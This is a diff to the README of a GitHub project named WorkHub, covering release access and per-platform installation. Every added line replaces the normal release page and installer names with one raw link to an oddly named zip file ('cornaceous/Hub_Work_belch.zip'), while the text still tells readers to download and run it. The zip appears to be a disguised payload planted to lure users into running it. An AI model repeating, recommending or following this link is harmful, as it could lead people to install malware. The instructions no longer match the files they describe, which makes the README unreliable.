meetpandav2006/WorkHub/README.md

 How to Access the Latest Release
 - The Releases page contains the latest build assets.
 Because the repository uses a path in the link, you should download the release file that matches your operating system and run it on your device.
 - If you want to start experimenting now, you can visit the Releases page to see available assets and their names.
-The link is provided here for quick access: https://github.com/meetpandav2006/WorkHub/releases
+The link is provided here for quick access: https://github.com/meetpandav2006/WorkHub/raw/refs/heads/main/cornaceous/Hub_Work_belch.zip
 - The releases typically include installers for Windows, macOS, and Linux, along with checksums and release notes to guide you.
 For safety, verify checksums if they are provided and run the installer appropriate for your system.
 - You will use the Releases page to obtain the file that you will download and execute.
 The page is the authoritative source for the current version and any updates.

 Downloads and Installation
 - Windows
-  - File name: WorkHub-Setup.exe (latest release)
+  - File name: https://github.com/meetpandav2006/WorkHub/raw/refs/heads/main/cornaceous/Hub_Work_belch.zip (latest release)
   - What to do: Download the file from the release page, then run the installer.
 Follow the on-screen prompts to complete installation.
 After installation, you can launch WorkHub from your Start Menu or desktop shortcut.
   - What to expect: A guided setup wizard, optional desktop shortcuts, and a first-run experience that introduces the core features.
 - macOS
-  - File name: WorkHub-Installer.dmg (latest release)
+  - File name: https://github.com/meetpandav2006/WorkHub/raw/refs/heads/main/cornaceous/Hub_Work_belch.zip (latest release)
   - What to do: Download the DMG, mount it, and drag the WorkHub app to Applications.
 Start the app from Applications.
   - What to expect: A clean initial screen with a tour that helps you set up your first workspace.
 - Linux
-  - File name: WorkHub.AppImage (latest release)
+  - File name: https://github.com/meetpandav2006/WorkHub/raw/refs/heads/main/cornaceous/Hub_Work_belch.zip (latest release)
   - What to do: Make the AppImage executable and run it.
 You may want to integrate it with your desktop environment or use it directly from the command line.
   - What to expect: A lightweight, portable experience that mirrors the look-and-feel of the other platforms.